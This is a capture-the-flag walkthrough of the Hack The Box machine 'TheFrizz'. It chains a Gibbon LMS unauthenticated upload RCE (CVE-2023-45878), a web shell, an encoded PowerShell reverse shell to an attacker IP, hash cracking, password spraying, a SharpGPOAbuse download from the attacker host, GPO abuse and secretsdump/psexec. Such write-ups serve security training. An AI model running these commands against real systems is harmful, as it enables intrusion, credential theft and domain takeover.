Machine Information: TheFrizz is a medium-difficulty Windows machine featuring a web application showcasing Walkerville Elementary School and a Gibbon LMS instance.
IP : 10.10.11.60
Difficulty: Medium
Nmap
nmap 10.10.11.60 -v -p- -A nmap/nmap_
Nmap scan report for 10.10.11.60
Host is up (0.031s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-22 06:46:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
55113/tcp open msrpc Microsoft Windows RPC
55117/tcp open msrpc Microsoft Windows RPC
55126/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-22T06:47:03
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 4h20m00s
By looking at the nmap scan, it is evident that this is an Active Directory machine. Since the credentials are not provided, lets enumerate through the acessible services. By far the most appealing is the HTTP service as no credentials are provided.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz]
└─$ nxc smb 10.10.11.60
SMB 10.10.11.60 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
I like to run the netexec to check the domain and the machine name while the scans are running. Notice that the NTLM authentication is disabled. If the NTLM authentication was enabled, an alternate way can be to start with checking SMB to confirm if anonymous login was allowed and if we had any accessible shares. Lets update the /etc/hosts file as following so that the redirection of the website can be resolved and we can access the website.
10.10.11.60 frizzdc.frizz.htb frizz.htb frizzdc
HTTP (Port 80)
Accessing the website on port 80 displays the elementary school website. Lets enumerate the website to see what information we can get about it.
The home page has a hacking and law tab that seems to have base64 encoded strings on the page.
Scrolling to the bottom of the website has testimonials. One of the testimonials appears to be interesting. It is possibly from one of the teachers.
On the top navigation bar, there is a staff login page. Navigating to the staff login page reveals possibly the LMS being used along with the version being used. Gibbons LMS is being used by the school its version is 25.0.0. There is also a note to notify the user’s that Ms Fiona Frizzle is migrating the LMS to use Azure Active Directory SSO.
I also explored the hyperlinks related to Ross Parker and the FAQs on the Gibbons LMS home page to find additional information but that is not required for this box. The staff login page also has login feature. Next possible steps would be to research any exploits for the LMS, look for sql injection on the login page or potentially brute force the login page as I already got information for one user ‘Ms Fiona Frizzle’. As we do not have any information about the lockout attempts, I will keep brute forcing login page as the last resort.
Researching Gibbons LMS 25.0.0
Looking at the exploits for Gibbons, I found 2 possible RCE exploits for this version. However, one is an authenticated RCE and the other is unauthenticated RCE. As we do not have any valid credentials so far, lets explore the unauthenticated RCE (CVE-2023-45878).
CVE 2023-45878: Gibbon LMS versions 25.0.1 and earlier are vulnerable to an Arbitrary File Upload that can lead to Remote Code Execution (RCE). The issue stems from the rubrics_visualise_saveAjax.php endpoint, which, notably, does not require authentication. Because of this, unauthenticated attackers could potentially upload malicious PHP files and execute arbitrary code on the server.
Exploiting CVE-2023-45878
I found a POC from GitHub that uses python3 to exploit this vulnerability CVE-2023-45878.
Copy the exploit.py file on your system and check by running a simple whoami command.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/CVE-2023-45878]
└─$ python3 exploit.py -t frizz.htb -c "whoami"
[+] Uploading web shell as zwomrazk.php...
[+] Upload successful.
[+] Executing command on: http://frizz.htb/Gibbon-LMS/zwomrazk.php?cmd=whoami
[+] Command output:
frizz\w.webservice
Now, lets get a reverse shell to our machine by adding our machine ip and the port that we are listening to. Before running the command, make sure you have your listener ready on the port that you have specified. The command will run a powershell reverse shell payload on the victim machine and give us a shell.
nc -nvlp 4445
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/CVE-2023-45878]
└─$ python3 exploit.py -t frizz.htb -s -i 10.10.14.2 -p 4445
[+] Uploading web shell as jobyjgrq.php...
[+] Upload successful.
[+] Sending PowerShell reverse shell payload to http://frizz.htb/Gibbon-LMS/jobyjgrq.php
[*] Make sure your listener is running: nc -lvnp 4445
[+] Executing command on: http://frizz.htb/Gibbon-LMS/jobyjgrq.php?cmd=powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand CgAgACAAIAAgACQAYwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABDAFAAQwBsAGkAZQBuAHQAKAAiADEAMAAuADEAMAAuADEANAAuADIAIgAsADQANAA0ADUAKQA7AAoAIAAgACAAIAAkAHM...................................................
[!] Error connecting to web shell: HTTPConnectionPool(host='frizz.htb', port=80): Read timed out. (read timeout=5)
Once the exploit is triggered, it will connect to our machine and give us a shell from the w.webservice user.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/CVE-2023-45878]
└─$ nc -nvlp 4445
listening on [any] 4445 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.60] 50217
whoami
frizz\w.webservice
PS C:\xampp\htdocs\Gibbon-LMS>
Enumerating through W.Webservice User
Once we have a shell, the next step is to enumerate the machine to see what this user has access to and what we can do with this user. Another possible way forward can be to upload a sharphound collector and gather data for the bloodhound. At first, I checked the list of users and the privileges this user has.
PS C:\xampp\htdocs\Gibbon-LMS> net user
User accounts for \\FRIZZDC
-------------------------------------------------------------------------------
a.perlstein Administrator c.ramon
c.sandiego d.hudson f.frizzle
g.frizzle Guest h.arm
J.perlstein k.franklin krbtgt
l.awesome m.ramon M.SchoolBus
p.terese r.tennelli t.wright
v.frizzle w.li w.Webservice
The command completed successfully.
PS C:\xampp\htdocs\Gibbon-LMS> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Looking at the files, there is a config.php file that has DB credentials hard-coded. After gathering the credentials, ran netstat to confirm that mysql is running.
PS C:\xampp\htdocs\Gibbon-LMS> type config.php
<?php
/*
Gibbon, Flexible & Open School System
Copyright (C) 2010, Ross Parker
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/**
* Sets the database connection information.
* You can supply an optional $databasePort if your server requires one.
*/
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'Mister[Redacted]]';
$databaseName = 'gibbon';
/**
PS C:\xampp\htdocs\Gibbon-LMS> netstat -ant
Active Connections
Proto Local Address Foreign Address State Offload State
...........................................................................
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING InHost
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING InHost
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING InHost
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING InHost
...........................................................................
I found mysql.exe binary in the C:\xampp\mysql\bin\ directory that we can use to connect to the database and see what data we can access. The gibbon database has ‘gibbonperson’ table that has credentials for f.frizzle user, one of the teacher referred on the website as well. The credentials included the hash and the salt used for the password.
PS C:\xampp\mysql\bin> .\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 --database=gibbon -e "select * from gibbonperson;"
gibbonPersonID title surname firstName preferredName officialName nameInCharacters gender username passwordStrong passwordStrongSalt passwordForceReset
0000000001 Ms. Frizzle Fiona Fiona Fiona Frizzle Unspecified f.frizzle 067f746faca44f170c6cd9[..SNIP..]80ff784242b0b0c03 /aACFh[..SNIP..]]z2489 N Full Y 001 001NULL f.frizzle@frizz.htb
Before attempting to crack the hash, we need to understand the type of hash. I utilized hash-identifier to get the hash type, in this case SHA-256. Looking at the online hashcat wiki, the module for cracking sha256 with salt is ‘1420’. Lets attempt to crack this hash using the rockyou list.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ hash-identifier 067f746faca44f170c6cd9[..SNIP..]8687733f80ff784242b0b0c03
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
Possible Hashs:
[+] SHA-256
[+] Haval-256
Cracking F.Frizzle Password
hashcat -m 1420 frizzle.hash /usr/share/wordlists/rockyou.txt -O
Hashcat successfully cracked the password for this user.
Using F.Frizzle Credentials
To utilize the credentials, we need to generate a ticket for this user and configure krb5.conf file to utilize it for authentication as only kerberos authentication is allowed. At first, lets generate a ticket for this user using impacket’s getTGT. After generating the ticket, it can be verified using netexec.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ getTGT.py frizz.htb/'f.frizzle':'[Password_Redacted]'
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Saving ticket in f.frizzle.ccache
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ export KRB5CCNAME=/home/kali/Downloads/HTB/TheFrizz/files/f.frizzle.ccache
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ nxc smb 10.10.11.60 -u 'f.frizzle' -p '[Password_Redacted]' -k
SMB 10.10.11.60 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.10.11.60 445 frizzdc [+] frizz.htb\f.frizzle:[Redacted]
Logging to SSH as F.Frizzle
As we have valid credentials, lets use it to login to SSH. Before I login, I need to setup the krb5.conf file. I setup the conf file as following. You can also use netexec module to generate krb5.conf file. Once the file is generated, setup the environment variable to configure the file to be used for authentication.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ cat frizz
[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = FRIZZ.HTB
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
default_domain = frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ export KRB5_CONFIG=/home/kali/Downloads/HTB/TheFrizz/files/frizz
Once all is setup, you can login to the ssh as following. Once logged in, this user can also be used to retrieve the user flag. If the SSH login fails, make sure you have set up the /etc/hosts file as mentioned earlier.
ssh f.frizzle@frizzdc.frizz.htb -K
At this point, you can also run winpeas for privilege escalation. Going through the box, I found Recycle Bin folder with 7z files. I copied these files using scp.
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> dir
Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/29/2024 7:31 AM 148 $IE2XMEG.7z
-a--- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ scp f.frizzle@frizzdc.frizz.htb:'C:/$RECYCLE.BIN/S-1-5-21-2386970044-1145388522-2932701813-1103/$IE2XMEG.7z' ./IE2XMEG.7z
$IE2XMEG.7z
──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ scp f.frizzle@frizzdc.frizz.htb:'C:/$RECYCLE.BIN/S-1-5-21-2386970044-1145388522-2932701813-1103/$RE2XMEG.7z' ./RE2XMEG.7z
$RE2XMEG.7z
Unzipping these files gave potential password for one of the domain user. The password appeared to be base64 encoded and it can decoded.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ echo IXN1QmNpZ0BNZWhUZWQhUgo= | base64 -d
!suB[REDACTED]
Spraying the Password
Everytime we have a potential password, we shall spray the password against the domain users to see if we got any potential login as password reuse is very common. Lets use netexec for getting a users list and spray the password against them.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ nxc smb 10.10.11.60 -u 'f.frizzle' -p '[Redacted]' -k --users
SMB 10.10.11.60 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.10.11.60 445 frizzdc [+] frizz.htb\f.frizzle:[Redacted]
SMB 10.10.11.60 445 frizzdc -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.60 445 frizzdc Administrator 2025-02-25 21:24:10 0 Built-in account for administering the computer/domain
SMB 10.10.11.60 445 frizzdc Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.60 445 frizzdc krbtgt 2024-10-29 14:19:54 0 Key Distribution Center Service Account
SMB 10.10.11.60 445 frizzdc f.frizzle 2024-10-29 14:27:03 0 Wizard in Training
SMB 10.10.11.60 445 frizzdc w.li 2024-10-29 14:27:03 0 Student
SMB 10.10.11.60 445 frizzdc h.arm 2024-10-29 14:27:03 0 Student
SMB 10.10.11.60 445 frizzdc M.SchoolBus 2024-10-29 14:27:03 0 Desktop Administrator
SMB 10.10.11.60 445 frizzdc d.hudson 2024-10-29 14:27:03 0 Student
SMB 10.10.11.60 445 frizzdc k.franklin 2024-10-29 14:27:03 0 Student
SMB 10.10.11.60 445 frizzdc l.awesome 2024-10-29 14:27:03 0 Student
SMB 10.10.11.60 445 frizzdc t.wright 2024-10-29 14:27:03 0 Student
SMB 10.10.11.60 445 frizzdc r.tennelli 2024-10-29 14:27:04 0 Student
SMB 10.10.11.60 445 frizzdc J.perlstein 2024-10-29 14:27:04 0 Student
SMB 10.10.11.60 445 frizzdc a.perlstein 2024-10-29 14:27:04 0 Student
SMB 10.10.11.60 445 frizzdc p.terese 2024-10-29 14:27:04 0 Student
SMB 10.10.11.60 445 frizzdc v.frizzle 2024-10-29 14:27:04 0 The Wizard
SMB 10.10.11.60 445 frizzdc g.frizzle 2024-10-29 14:27:04 0 Student
SMB 10.10.11.60 445 frizzdc c.sandiego 2024-10-29 14:27:04 0 Student
SMB 10.10.11.60 445 frizzdc c.ramon 2024-10-29 14:27:04 0 Student
SMB 10.10.11.60 445 frizzdc m.ramon 2024-10-29 14:27:04 0 Student
SMB 10.10.11.60 445 frizzdc w.Webservice 2024-10-29 14:27:04 0 Service for the website
SMB 10.10.11.60 445 frizzdc [*] Enumerated 21 local users: frizz
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ nxc smb 10.10.11.60 -u users.txt -p '!suB[Redacted]' -k
SMB 10.10.11.60 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.10.11.60 445 frizzdc [-] frizz.htb\Administrator:!suB[Redacted] KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.60 445 frizzdc [-] frizz.htb\f.frizzle:!suB[Redacted] KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.60 445 frizzdc [-] frizz.htb\w.li:!suB[Redacted] KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.60 445 frizzdc [-] frizz.htb\h.arm:!suB[Redacted] KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.60 445 frizzdc [+] frizz.htb\M.SchoolBus:!suB[Redacted]
I found a valid login credentials for M.SchoolBus user. Lets see what type of access this user has by checking it on Bloodhound.
BloodHound
After gaining the f.frizzle credentials, I also used these credentials to get bloodhound data to enumerate the domain.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/bloodhound]
└─$ bloodhound-python -d frizz.htb -u 'f.frizzle' -p '[Password_Redacted]' -ns 10.10.11.60 -c all -k
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: frizz.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: frizzdc.frizz.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: frizzdc.frizz.htb
INFO: Found 22 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: frizzdc.frizz.htb
INFO: Done in 00M 06S
M.SchoolBus user has WriteGPLink right over the class_frizz that contains one of the domain admins. This means we can use abuse it to add a new GPO and add ourself as the administrator on the machine. This might not be appropriate to do in a real-world scenario but safe to do in a ctf environment.
Abusing GPOAbuse
Before I can abuse this right, I need to setup kerberos authentication for m.schoolbus user. Once logged in, I created a new GPO and linked it to the domain. After that, I transferred the SharpGPOAbuse executable to add the m.schoolbus user to the localadmin group on the machine giving us administrator rights.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ getTGT.py frizz.htb/M.SchoolBus
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password:
[*] Saving ticket in M.SchoolBus.ccache
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ export KRB5CCNAME=/home/kali/Downloads/HTB/TheFrizz/files/M.SchoolBus.ccache
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ ssh M.SchoolBus@frizzdc.frizz.htb
PowerShell 7.4.5
PS C:\Users\M.SchoolBus>
New-GPO -Name "zm" | New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes
After creating a new GPO and linking it, lets transfer the SharpGPOAbuse binary by setting up an http server. Download the file using the powershell download functionality.
python3 -m http.server
PS C:\Users\M.SchoolBus> (New-Object Net.WebClient).DownloadFile('http://10.10.14.2:8000/SharpGPOAbuse.exe','SharpGPOAbuse.exe')
Now, lets add the user to the local admin group. Once the user is added, forcibly update the policy across the domain.
PS C:\Users\M.SchoolBus> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName "zm" --force
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.SchoolBus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "zm" is: {8E47956B-4D5F-4F55-890B-F632EBF1FDDC}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{8E47956B-4D5F-4F55-890B-F632EBF1FDDC}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Users\M.SchoolBus> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
Once the policy is updated, you can see that the M.SchoolBus is part of local administrator group.
PS C:\Users\M.SchoolBus> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
M.SchoolBus
The command completed successfully.
As this user is now admin, we can use this user’s credentials to dump all secrets from the domain using impacket’s secretdump.
secretsdump.py frizz.htb/M.SchoolBus@frizzdc.frizz.htb -k -dc-ip 10.10.11.60
To get the root flag, you can use the psexec to get the session on the machine as an administrator.
psexec.py frizz.htb/Administrator@frizzdc.frizz.htb -hashes ':[HASH_REDACTED]' -k
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is D129-C3DA
Directory of C:\Users\Administrator\Desktop
03/11/2025 04:14 PM <DIR> .
03/11/2025 03:37 PM <DIR> ..
02/25/2025 03:06 PM 2,083 cleanup.ps1
08/21/2025 11:27 PM 34 root.txt
2 File(s) 2,117 bytes
2 Dir(s) 1,878,962,176 bytes free
If you find this blog useful, please consider giving respect on Hack The Box.